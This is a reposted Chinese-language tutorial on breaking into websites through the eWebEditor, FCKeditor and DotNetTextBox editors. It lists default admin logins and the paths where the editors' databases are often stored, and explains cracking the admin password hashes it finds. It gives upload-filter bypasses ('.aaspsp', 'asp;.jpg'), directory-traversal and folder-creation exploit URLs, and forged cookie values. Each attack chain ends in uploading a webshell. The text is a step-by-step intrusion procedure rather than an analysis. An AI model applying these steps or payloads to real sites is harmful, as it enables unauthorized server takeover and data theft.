1.常見(jiàn)的編輯器

常見(jiàn)的有Ewebeditor,fckeditor,ckeditor,kindeditor等等。這里有份編輯器漏洞手冊(cè):

2.Ewebeditor編輯器

Ewebeditor是基于瀏覽器的、所見(jiàn)即所得的在線HTML編輯器。她能夠在網(wǎng)頁(yè)上實(shí)現(xiàn)許多桌面編輯軟件(如：Word)所具有的強(qiáng)大可視編輯功能。WEB開(kāi)發(fā)人員可以用她把傳統(tǒng)的多行文本輸入框替換為可視化的富文本輸入框，使最終用戶可以可視化的發(fā)布HTML格式的網(wǎng)頁(yè)內(nèi)容。eWebEditor!已基本成為網(wǎng)站內(nèi)容管理發(fā)布的必備工具！

3.Ewebeditor利用核心

如何發(fā)現(xiàn)編輯器地址

Ewebeditor：

默認(rèn)后臺(tái)：ewebeditor/admin_login.asp

默認(rèn)數(shù)據(jù)庫(kù)：ewebeditor/db/ewebeditor.mdb

默認(rèn)賬號(hào)密碼：admin admin/admin888

4.利用過(guò)程

通常入侵ewebeditor編輯器的步驟如下:

1、首先訪問(wèn)默認(rèn)管理頁(yè)看是否存在

默認(rèn)管理頁(yè)地址2.80以前為?ewebeditor/admin_login.asp?以后版本為admin/login.asp(其他語(yǔ)言改后戳,這里以asp為例)

。

2、默認(rèn)管理帳號(hào)密碼

默認(rèn)管理頁(yè)存在！我們就用帳號(hào)密碼登陸！默認(rèn)帳號(hào)密碼為: admin admin888?！常用的密碼還有admin

admin999 admin1 admin000?之類的。

3、默認(rèn)數(shù)據(jù)庫(kù)地址

如果密碼不是默認(rèn)的。我們?cè)L問(wèn)的就不是默認(rèn)數(shù)據(jù)庫(kù)！嘗試下載數(shù)據(jù)庫(kù)得到管理員密碼！管理員的帳號(hào)密碼，都在eWebEditor_System表段里，sys_UserName

Sys_UserPass?都是md5加密的。得到了加密密碼。可以去www.cmd5.com www.xmd5.org?等網(wǎng)站進(jìn)行查詢！暴力這活好久不干了！也可以丟國(guó)外一些可以跑密碼的網(wǎng)站去跑!

默認(rèn)數(shù)據(jù)庫(kù)路徑為:ewebeditor/db/ewebeditor.mdb?常用數(shù)據(jù)庫(kù)路徑為:

ewebeditor/db/ewebeditor.asa

ewebeditor/db/ewebeditor.asp

ewebeditor/db/#ewebeditor.asa

ewebeditor/db/#ewebeditor.mdb

ewebeditor/db/!@#ewebeditor.asp

ewebeditor/db/ewebeditor1033.mdb?等等。

很多管理員常改.asp后綴，一般訪問(wèn).asp

.asa?后綴的都是亂碼！可以用下載工具下載下來(lái)，然后更改后綴為.mdb來(lái)查看內(nèi)容！

4、漏洞基本利用步驟，以asp為例！

1)? 登陸后臺(tái)以后。選擇樣式管理，默認(rèn)編輯器的默認(rèn)樣式都不可以修改的。我們可以從任意樣式新建一個(gè)樣式，然后在圖片上傳添加可上傳后綴。.asa .cer .cdx 等！.asp 過(guò)濾過(guò)了。但是我們可以用.aaspsp后綴來(lái)添加，這樣上傳文件正好被ewebeditor 吃掉asp后綴，剩下.asp 。同樣，如果遇到一個(gè)管理員有安全意識(shí)的，從代碼里，把.asp .asa .cer .cdx 都完全禁止了，我們也可以用.asasaa

后綴來(lái)突破。添加完了后綴，可以在樣式管理，點(diǎn)擊預(yù)覽，然后上傳！

asa|cer|asp|aaspsp

Asa cer 它可以在iis6.0平臺(tái)解析為asp執(zhí)行

Aaspsp：繞過(guò)過(guò)濾 過(guò)濾asp aaspsp=》asp

注意：低版本ewebeditor不支持ie7.0以下版本訪問(wèn)(ietest軟件模擬ie6.0上傳)

以下以2.1.6這個(gè)版本為例來(lái)演示:

點(diǎn)擊樣式管理,然后新增樣式

在圖片類型中加入以下類型:asa|cer|asp|aaspsp

然后點(diǎn)擊提交。

然后在工具欄里新增工具

在按鈕設(shè)置里新增"插入或修改圖片"

然后點(diǎn)擊保存設(shè)置。然后再回去點(diǎn)擊預(yù)覽。

控件效果就出來(lái)了。然后直接上傳一句話木馬

點(diǎn)擊確定，上傳成功，之后，查看代碼，就能看到完整的地址

用菜刀一連就能就OK了。。。

2)目錄遍歷

點(diǎn)擊"上傳文件管理" 然后選擇樣式目錄。

在id=14后面加上&dir=../

http://192.168.87.129:8123/admin_uploadfile.asp?id=14&dir=../

發(fā)現(xiàn)沒(méi)有起作用，那就是2.1.6這個(gè)版本不存在這個(gè)漏洞。換成2.8.0。2.8.0存在這個(gè)漏洞

能遍歷目錄。

3)尋找前人痕跡再次入侵

有時(shí)候用戶名與密碼得等不進(jìn)去，但是數(shù)據(jù)庫(kù)可以下載，這時(shí)候就可以看下是否有前人入侵過(guò)，如果有人入侵過(guò)的話，就可以利用下面的方法進(jìn)入突破。

如何判斷有前人入侵過(guò)了??下載好數(shù)據(jù)庫(kù)之后查看他的eWebEditor_style表中的S_ImageExt字段是否有被人添加過(guò)什么。

使用下面的語(yǔ)句進(jìn)入突破:

ewebeditor.asp?ID=xx&style=yy

其中的id=xx就是被修改過(guò)的那條記錄的id，而yy就是S_name字段的名字。

例如這里就修改成: ewebeditor.asp?ID=54&style=testckse 去訪問(wèn)

圖片控件就出來(lái)了。。

5.FCKeditor編輯器

1.查看編輯器版本

FCKeditor/_whatsnew.html

2.FCKeditor編輯器頁(yè)

FCKeditor/_samples/default.html

3.常用上傳地址

1. FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

2. FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/3. FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

4. FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp

由于這里用的是2.5的版本所以下面這條語(yǔ)句能用

http://192.168.87.129:8234//editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp

如果在輸入以上地址測(cè)試的過(guò)程中彈出以下的提示

那就是沒(méi)有開(kāi)啟文件上傳功能,要把\editor\filemanager\connectors\asp\config.asp文件中的

Dim ConfigIsEnabled

ConfigIsEnabled = False

設(shè)置成功true。就行了，然后上傳6.asp;.jpg文件試試

發(fā)現(xiàn)他進(jìn)行了過(guò)濾6.asp;.jpg改成了6_asp;.jpg,把點(diǎn)改成了下劃線。審查元素看下圖片的路徑

訪問(wèn)這個(gè)路徑看下。

asp文件并沒(méi)有被解析成功。

這就是fckeditor過(guò)濾"."為"_"的一個(gè)機(jī)制,想要突破的話有以下兩種方式：

1.二次上傳

第一次上傳：qq.asp;.jpg ==》qq_asp;.jpg

第二次上傳：qq.asp;.jpg ==》qq_asp;.jpg (不滿足命名要求)

可能出現(xiàn)第二次命名為qq.asp;.(1).jpg

還是被過(guò)濾了。。

2.新建上傳

手動(dòng)新建一個(gè)文件夾

發(fā)現(xiàn)他還是過(guò)濾了。那我們只有突破建立文件夾了。

執(zhí)行以下地址就能成功創(chuàng)建文件夾

/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/fendo.asp&NewFolderName=x.asp

這又是為什么了????手動(dòng)不能創(chuàng)建，而通過(guò)以上地址就能成功創(chuàng)建了，讓我們來(lái)對(duì)比下，手動(dòng)創(chuàng)建和通過(guò)以上地址創(chuàng)建的一個(gè)區(qū)別。

漏洞地址：

/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/fendo.asp&NewFolderName=x.asp

手工新建：

/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/&NewFolderName=fendo.asp

原因：

CurrentFolder：當(dāng)前文件夾未進(jìn)行過(guò)濾(這個(gè)文件夾下的沒(méi)有過(guò)濾)

NewFolderName：新建文件名進(jìn)行了過(guò)濾

這就是為什么通過(guò)上面地址能創(chuàng)建，而手動(dòng)卻不能創(chuàng)建的一個(gè)原因，然后我們?cè)偕蟼?.asp;.jpg到fendo.asp文件下看是否成功解析。

成功解析。。

3.DotNetTextBox編輯器漏洞利用

DotNetTextBox編輯器洞洞文件上傳漏洞

詳細(xì)說(shuō)明：

漏洞證明：

1、用firebug將disabled="disabled'，value="jgp,gif,png"修改為enabled="enabled",value="jpg,gif,png,aspx"，然后點(diǎn)更新成功按鈕

2、彈出更新成功

3、刷新頁(yè)面，發(fā)現(xiàn)此時(shí)可允許上傳的圖片類型，成功新增aspx類型

4、找個(gè)aspx webshell上傳、提示文件上傳成功

5、上傳成功、成功躺在那里

6、webshell頁(yè)面

但是有 system_dntb/uploadimg.aspx 并能打開(kāi)，這時(shí)候是不能上傳的，由于他是驗(yàn)證cookie來(lái)得出上傳后的路徑，這樣我們可以用cookie欺騙工具?；蛘哂胋urpsuite抓包修改cookie，修改為：

cookie:UserType=0; IsEdition=0; Info=1; uploadFolder=../system_dntb/Upload/

路徑可以修改，只是權(quán)限夠，上傳后改名為1.asp;.jpg利用iis解析漏洞。

總結(jié)

以上是生活随笔為你收集整理的ue编辑器漏洞_7. 编辑器漏洞整理的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。